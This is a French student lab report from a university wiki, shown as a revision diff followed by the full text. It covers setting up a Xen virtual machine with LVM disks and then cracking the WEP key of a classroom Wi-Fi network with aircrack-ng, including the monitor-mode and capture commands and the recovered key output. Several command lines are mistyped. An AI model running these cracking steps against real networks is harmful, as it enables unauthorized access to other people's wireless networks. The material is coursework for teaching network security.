TP sysres IMA2a5 2021/2022 G12 : Différence entre versions
|  (→Création machine virtuelle) | |||
| Ligne 58 : | Ligne 58 : | ||
| − | Craquage clé  | + | Craquage clé WEP: | 
| + | |||
| + | Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01". | ||
| + | |||
| + | Tout d'abord, on installe l'utilitaire aircrack-ng | ||
| + | |||
| + |   su - | ||
| + |   apt install aircrack-ng | ||
| + | |||
| + | On prend une clé USB Wifi et on vérifie qu'elle est reconnue par l'ordinateur : | ||
| + | |||
| + |   lsusb | ||
| + | |||
| + |  Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter | ||
| + |  Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub | ||
| + |  Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub | ||
| + |  Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub | ||
| + |  Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub | ||
| + |  Bus 001 Device 010: ID 413c:2005 Dell Computer Corp. RT7D50 Keyboard | ||
| + |  Bus 001 Device 007: ID 413c:301a Dell Computer Corp.  | ||
| + |  Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub | ||
| + |  Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub | ||
| + | |||
| + | |||
| + | On réalise les commandes suivants : | ||
| + | |||
| + |  airmon -ng  | ||
| + | |||
| + | PHOTO | ||
| + | |||
| + | On va renommer l'interface en wlan0, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor : | ||
| + | |||
| + |   airmon -ng start wlx40a5ef059e47 | ||
| + | |||
| + | On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB: | ||
| + | |||
| + |   airodump -ng wlan0 | ||
| + | |||
| + | On obtient alors les informations suivantes : | ||
| + | |||
| + |  BSSID                 PWR     Beacons    #Data,   #/s      CH      MB      ENC     CIPHER   AUTH ESSID | ||
| + |  04:DA:D2:9C:50:50     -40           2      3       4        3      54e      WEP     WEP         cracotte01 | ||
| + | |||
| + | On filtre notre interface : | ||
| + | |||
| + |  BSSID                            PWR    RXQ  Beacons    #Data,   #/s      CH      MB      ENC     CIPHER   AUTH ESSID | ||
| + |  04:DA:D2:9C:50:50     -42        10      30     19          4      3      54e     WEP     WEP     cracotte01 | ||
| + | |||
| + | On lance l'interface dans ce terminal avec la commande suivante : | ||
| + | |||
| + |  airodump -ng -c 3 --bssid 04:DA:D2:9C:50:50 wlan0 | ||
| + | |||
| + | On va ouvrir un autre terminal et on lancera le cassage de la clé : | ||
| + | |||
| + |   airodump -ng /tmp/cracotte01-01.cap | ||
| + | |||
| + | On obtient : | ||
| + | |||
| + |  #   BSSID                               ESSID                    Encryption  | ||
| + |  1    04:DA:D2:9C:50:50        cracotte01            WEP (0 IVs) | ||
| + | |||
| + | Après 5-10min, on obtient le code de la clé Wifi :  | ||
| + | |||
|                                      Aircrack-ng 1.5.2   |                                      Aircrack-ng 1.5.2   | ||
Version du 29 novembre 2021 à 10:45
Création machine virtuelle
Dans un premier temps, on dois créer une machine virtuelle sur le serveur distant. On s'y connecte donc en tant que superuser :
ssh -4 root@capbreton.plil.info
On créer alors la machine grâce à la commande qui suit :
xen-create-image --force --hostname=Battlefield --ip=193.48.57.172 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster
La machine est alors créée sur capbreton. On passe à la configuration des disques, pour créer un RAID5 :
lvcreate -L1G -n Battlefield1 virtual lvcreate -L1G -n Battlefield2 virtual lvcreate -L1G -n Battlefield3 virtual lvcreate -L1G -n Battlefield4 virtual
On augmente ensuite la taille des 4 disques :
lvextend -L +9G /dev/virtual/Battlefield1 lvextend -L +9G /dev/virtual/Battlefield2 lvextend -L +9G /dev/virtual/Battlefield3 lvextend -L +9G /dev/virtual/Battlefield4
On vérifie que les disques sont bien installés : 
lvdisplay
Détail d'un disque installé :
--- Logical volume --- LV Path /dev/virtual/Battlefield1 LV Name Battlefield1 VG Name virtual LV UUID gvf9pC-5DAB-1YGt-fYJ1-ecrM-nZG2-ZFCf41 LV Write Access read/write LV Creation host, time capbreton, 2021-09-24 08:40:48 +0200 LV Status available # open 0 LV Size 10.00 GiB Current LE 2560 Segments 2 Allocation inherit Read ahead sectors auto - currently set to 256 Block device 254:57
Puis on formate les disques :
mke2fs /dev/virtual/Battlefield1 mke2fs /dev/virtual/Battlefield2 mke2fs /dev/virtual/Battlefield3 mke2fs /dev/virtual/Battlefield4
Craquage clé WEP:
Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".
Tout d'abord, on installe l'utilitaire aircrack-ng
su - apt install aircrack-ng
On prend une clé USB Wifi et on vérifie qu'elle est reconnue par l'ordinateur :
lsusb
Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 001 Device 010: ID 413c:2005 Dell Computer Corp. RT7D50 Keyboard Bus 001 Device 007: ID 413c:301a Dell Computer Corp. Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
On réalise les commandes suivants :
airmon -ng
PHOTO
On va renommer l'interface en wlan0, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :
airmon -ng start wlx40a5ef059e47
On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:
airodump -ng wlan0
On obtient alors les informations suivantes :
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:50 -40 2 3 4 3 54e WEP WEP cracotte01
On filtre notre interface :
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:50 -42 10 30 19 4 3 54e WEP WEP cracotte01
On lance l'interface dans ce terminal avec la commande suivante :
airodump -ng -c 3 --bssid 04:DA:D2:9C:50:50 wlan0
On va ouvrir un autre terminal et on lancera le cassage de la clé :
airodump -ng /tmp/cracotte01-01.cap
On obtient :
# BSSID ESSID Encryption 1 04:DA:D2:9C:50:50 cracotte01 WEP (0 IVs)
Après 5-10min, on obtient le code de la clé Wifi :
                                   Aircrack-ng 1.5.2 
                      [00:00:00] Tested 721 keys (got 665952 IVs)
  KB    depth   byte(vote)
   0    1/  2   27(703488) 1D(696832) 92(694528) EB(692224) A6(689408) 9D(688896) 
   1    2/  1   D0(698112) 65(697344) A7(696320) 0D(695296) 21(693504) 3A(692224) 
   2    1/  3   9B(701440) FC(697344) 2E(695808) 6D(692224) 57(689152) CF(688640) 
   3    1/  5   BB(703232) 30(700416) A6(699392) AB(699136) C2(696064) 36(695296) 
   4   13/  4   35(687104) D6(686592) 76(686080) 23(685824) 48(685824) 63(685568) 
            KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ] 
Decrypted correctly: 100%
